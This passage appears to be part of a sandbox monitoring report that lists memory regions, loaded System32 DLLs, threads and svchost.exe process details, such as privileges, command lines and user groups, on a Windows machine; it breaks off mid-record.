Region: id = 15790 start_va = 0x7ffbfced0000 end_va = 0x7ffbfcf37fff entry_point = 0x7ffbfced0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 15791 start_va = 0x7ffbfdab0000 end_va = 0x7ffbfdacdfff entry_point = 0x7ffbfdab0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 15792 start_va = 0x7ffbfdc10000 end_va = 0x7ffbfdc19fff entry_point = 0x7ffbfdc10000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 15793 start_va = 0x7ffbfe0d0000 end_va = 0x7ffbfe0dafff entry_point = 0x7ffbfe0d0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 15794 start_va = 0x7ffbfe0f0000 end_va = 0x7ffbfe127fff entry_point = 0x7ffbfe0f0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 15795 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 15796 start_va = 0x7ffbff210000 end_va = 0x7ffbff236fff entry_point = 0x7ffbff210000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 15797 start_va = 0x7ffbff5d0000 end_va = 0x7ffbff601fff entry_point = 0x7ffbff5d0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 15798 start_va = 0x7ffbff610000 end_va = 0x7ffbff691fff entry_point = 0x7ffbff610000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 15799 start_va = 0x7ffbff7c0000 end_va = 0x7ffbff7e2fff entry_point = 0x7ffbff7c0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 15800 start_va = 0x7ffbffaf0000 end_va = 0x7ffbffafbfff entry_point = 0x7ffbffaf0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 15801 start_va = 0x7ffbffb00000 end_va = 0x7ffbffb25fff entry_point = 0x7ffbffb00000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 15802 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 15803 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 15804 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 15805 start_va = 0x7ffbfff10000 end_va = 0x7ffbfffb7fff entry_point = 0x7ffbfff10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 15806 start_va = 0x7ffc00110000 end_va = 0x7ffc0016cfff entry_point = 0x7ffc00110000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 15807 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 15808 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 15809 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 15810 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 15811 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 15812 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 15813 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 15814 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 15815 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 15816 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 15817 start_va = 0x7ffc01080000 end_va = 0x7ffc010d3fff entry_point = 0x7ffc01080000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 15818 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 15819 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15820 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 15821 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 15822 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 15823 start_va = 0x7ffc01b20000 end_va = 0x7ffc01ce4fff entry_point = 0x7ffc01b20000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 15824 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 15825 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15826 start_va = 0x7ffc02050000 end_va = 0x7ffc02057fff entry_point = 0x7ffc02050000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 15827 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15828 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 15829 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15830 start_va = 0x7ffc03980000 end_va = 0x7ffc039e8fff entry_point = 0x7ffc03980000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 15831 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 15832 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 15833 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 15834 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15835 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1305 os_tid = 0xbf4 Thread: id = 1306 os_tid = 0x554 Thread: id = 1307 os_tid = 0xb2c Thread: id = 1308 os_tid = 0xbd8 Thread: id = 1309 os_tid = 0x7d0 Thread: id = 1310 os_tid = 0x6c8 Thread: id = 1311 os_tid = 0x244 Thread: id = 1312 os_tid = 0x488 Thread: id = 1313 os_tid = 0x200 Thread: id = 1314 os_tid = 0x434 Thread: id = 1315 os_tid = 0x430 Thread: id = 1316 os_tid = 0x424 Thread: id = 1317 os_tid = 0x40c Thread: id = 1318 os_tid = 0x404 Process: id = "289" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x53147000" os_pid = "0x448" os_integrity_level = "0x4000" os_privileges = "0x20b00080" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k WbioSvcGroup" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 15631 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15632 start_va = 0xa808790000 end_va = 0xa80879ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a808790000" filename = "" Region: id = 15633 start_va = 0xa8087a0000 end_va = 0xa8087a5fff entry_point = 0xa8087a0000 region_type = mapped_file name = "wbiosrvc.dll.mui" filename = "\\Windows\\System32\\en-US\\wbiosrvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wbiosrvc.dll.mui") Region: id = 15634 start_va = 0xa8087b0000 end_va = 0xa8087c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a8087b0000" filename = "" Region: id = 15635 start_va = 0xa8087d0000 end_va = 0xa80884ffff entry_point = 0x0 region_type = private name = "private_0x000000a8087d0000" filename = "" Region: id = 15636 start_va = 0xa808850000 end_va = 0xa808853fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a808850000" filename = "" Region: id = 15637 start_va = 0xa808860000 end_va = 0xa808860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a808860000" filename = "" Region: id = 15638 start_va = 0xa808870000 end_va = 0xa808871fff entry_point = 0x0 region_type = private name = "private_0x000000a808870000" filename = "" Region: id = 15639 start_va = 0xa808880000 end_va = 0xa80893dfff entry_point = 0xa808880000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15640 start_va = 0xa808940000 end_va = 0xa808940fff entry_point = 0xa808940000 region_type = mapped_file name = "winbiostorageadapter.dll.mui" filename = "\\Windows\\System32\\WinBioPlugIns\\en-US\\winbioStorageadapter.dll.mui" (normalized: "c:\\windows\\system32\\winbioplugins\\en-us\\winbiostorageadapter.dll.mui") Region: id = 15641 start_va = 0xa808950000 end_va = 0xa808950fff entry_point = 0xa808950000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 15642 start_va = 0xa808960000 end_va = 0xa808960fff entry_point = 0x0 region_type = private name = "private_0x000000a808960000" filename = "" Region: id = 15643 start_va = 0xa808970000 end_va = 0xa808970fff entry_point = 0x0 region_type = private name = "private_0x000000a808970000" filename = "" Region: id = 15644 start_va = 0xa8089b0000 end_va = 0xa8089b6fff entry_point = 0x0 region_type = private name = "private_0x000000a8089b0000" filename = "" Region: id = 15645 start_va = 0xa808a00000 end_va = 0xa808afffff entry_point = 0x0 region_type = private name = "private_0x000000a808a00000" filename = "" Region: id = 15646 start_va = 0xa808b80000 end_va = 0xa808c7ffff entry_point = 0x0 region_type = private name = "private_0x000000a808b80000" filename = "" Region: id = 15647 start_va = 0xa808c80000 end_va = 0xa808d7ffff entry_point = 0x0 region_type = private name = "private_0x000000a808c80000" filename = "" Region: id = 15648 start_va = 0xa808d80000 end_va = 0xa808e7ffff entry_point = 0x0 region_type = private name = "private_0x000000a808d80000" filename = "" Region: id = 15649 start_va = 0xa808e80000 end_va = 0xa809007fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a808e80000" filename = "" Region: id = 15650 start_va = 0xa809060000 end_va = 0xa809066fff entry_point = 0x0 region_type = private name = "private_0x000000a809060000" filename = "" Region: id = 15651 start_va = 0xa809100000 end_va = 0xa8091fffff entry_point = 0x0 region_type = private name = "private_0x000000a809100000" filename = "" Region: id = 15652 start_va = 0xa809200000 end_va = 0xa809380fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a809200000" filename = "" Region: id = 15653 start_va = 0xa809390000 end_va = 0xa80944ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a809390000" filename = "" Region: id = 15654 start_va = 0xa809550000 end_va = 0xa80964ffff entry_point = 0x0 region_type = private name = "private_0x000000a809550000" filename = "" Region: id = 15655 start_va = 0x7df5ffaf0000 end_va = 0x7ff5ffaeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffaf0000" filename = "" Region: id = 15656 start_va = 0x7ff7b2d0c000 end_va = 0x7ff7b2d0dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2d0c000" filename = "" Region: id = 15657 start_va = 0x7ff7b2d10000 end_va = 0x7ff7b2e0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b2d10000" filename = "" Region: id = 15658 start_va = 0x7ff7b2e10000 end_va = 0x7ff7b2e32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b2e10000" filename = "" Region: id = 15659 start_va = 0x7ff7b2e34000 end_va = 0x7ff7b2e35fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2e34000" filename = "" Region: id = 15660 start_va = 0x7ff7b2e36000 end_va = 0x7ff7b2e36fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2e36000" filename = "" Region: id = 15661 start_va = 0x7ff7b2e38000 end_va = 0x7ff7b2e39fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2e38000" filename = "" Region: id = 15662 start_va = 0x7ff7b2e3a000 end_va = 0x7ff7b2e3bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2e3a000" filename = "" Region: id = 15663 start_va = 0x7ff7b2e3e000 end_va = 0x7ff7b2e3ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b2e3e000" filename = "" Region: id = 15664 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 15665 start_va = 0x7ffbfbf50000 end_va = 0x7ffbfbf7ffff entry_point = 0x7ffbfbf50000 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 15666 start_va = 0x7ffbfbf80000 end_va = 0x7ffbfc08bfff entry_point = 0x7ffbfbf80000 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 15667 start_va = 0x7ffbfc090000 end_va = 0x7ffbfc0fafff entry_point = 0x7ffbfc090000 region_type = mapped_file name = "nuivoicewbsadapters.dll" filename = "\\Windows\\System32\\WinBioPlugIns\\NUIVoiceWBSAdapters.dll" (normalized: "c:\\windows\\system32\\winbioplugins\\nuivoicewbsadapters.dll") Region: id = 15668 start_va = 0x7ffbfc100000 end_va = 0x7ffbfc10afff entry_point = 0x7ffbfc100000 region_type = mapped_file name = "winbiostorageadapter.dll" filename = "\\Windows\\System32\\WinBioPlugIns\\winbiostorageadapter.dll" (normalized: "c:\\windows\\system32\\winbioplugins\\winbiostorageadapter.dll") Region: id = 15669 start_va = 0x7ffbfc110000 end_va = 0x7ffbfc145fff entry_point = 0x7ffbfc110000 region_type = mapped_file name = "facerecognitionengineadapter.dll" filename = "\\Windows\\System32\\WinBioPlugIns\\FaceRecognitionEngineAdapter.dll" (normalized: "c:\\windows\\system32\\winbioplugins\\facerecognitionengineadapter.dll") Region: id = 15670 start_va = 0x7ffbfc150000 end_va = 0x7ffbfc694fff entry_point = 0x7ffbfc150000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 15671 start_va = 0x7ffbfc6a0000 end_va = 0x7ffbfc6d0fff entry_point = 0x7ffbfc6a0000 region_type = mapped_file name = "facerecognitionsensoradapter.dll" filename = "\\Windows\\System32\\WinBioPlugIns\\FaceRecognitionSensorAdapter.dll" (normalized: "c:\\windows\\system32\\winbioplugins\\facerecognitionsensoradapter.dll") Region: id = 15672 start_va = 0x7ffbfc730000 end_va = 0x7ffbfc737fff entry_point = 0x7ffbfc730000 region_type = mapped_file name = "winbioext.dll" filename = "\\Windows\\System32\\winbioext.dll" (normalized: "c:\\windows\\system32\\winbioext.dll") Region: id = 15673 start_va = 0x7ffbfc740000 end_va = 0x7ffbfc831fff entry_point = 0x7ffbfc740000 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 15674 start_va = 0x7ffbfc840000 end_va = 0x7ffbfc8dafff entry_point = 0x7ffbfc840000 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 15675 start_va = 0x7ffbfc8e0000 end_va = 0x7ffbfc979fff entry_point = 0x7ffbfc8e0000 region_type = mapped_file name = "wbiosrvc.dll" filename = "\\Windows\\System32\\wbiosrvc.dll" (normalized: "c:\\windows\\system32\\wbiosrvc.dll") Region: id = 15676 start_va = 0x7ffbfd190000 end_va = 0x7ffbfd19afff entry_point = 0x7ffbfd190000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 15677 start_va = 0x7ffbff210000 end_va = 0x7ffbff236fff entry_point = 0x7ffbff210000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 15678 start_va = 0x7ffbffcc0000 end_va = 0x7ffbffcc9fff entry_point = 0x7ffbffcc0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 15679 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 15680 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 15681 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 15682 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 15683 start_va = 0x7ffc00920000 end_va = 0x7ffc00930fff entry_point = 0x7ffc00920000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 15684 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 15685 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 15686 start_va = 0x7ffc01190000 end_va = 0x7ffc01350fff entry_point = 0x7ffc01190000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 15687 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15688 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 15689 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 15690 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 15691 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15692 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15693 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 15694 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15695 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15696 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1319 os_tid = 0x2f0 Thread: id = 1320 os_tid = 0x478 Thread: id = 1321 os_tid = 0x470 Thread: id = 1322 os_tid = 0x458 Thread: id = 1323 os_tid = 0x44c Thread: id = 1395 os_tid = 0xc90 Thread: id = 1396 os_tid = 0x77c Process: id = "290" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4c450000" os_pid = "0x45c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xe], "NT SERVICE\\CoreMessagingRegistrar" [0xa], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\NcdAutoSetup" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00011181" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Region: id = 15212 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15213 start_va = 0xcd2be00000 end_va = 0xcd2be0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cd2be00000" filename = "" Region: id = 15214 start_va = 0xcd2be10000 end_va = 0xcd2be10fff entry_point = 0xcd2be10000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 15215 start_va = 0xcd2be20000 end_va = 0xcd2be33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cd2be20000" filename = "" Region: id = 15216 start_va = 0xcd2be40000 end_va = 0xcd2bebffff entry_point = 0x0 region_type = private name = "private_0x000000cd2be40000" filename = "" Region: id = 15217 start_va = 0xcd2bec0000 end_va = 0xcd2bec3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cd2bec0000" filename = "" Region: id = 15218 start_va = 0xcd2bed0000 end_va = 0xcd2bed0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cd2bed0000" filename = "" Region: id = 15219 start_va = 0xcd2bee0000 end_va = 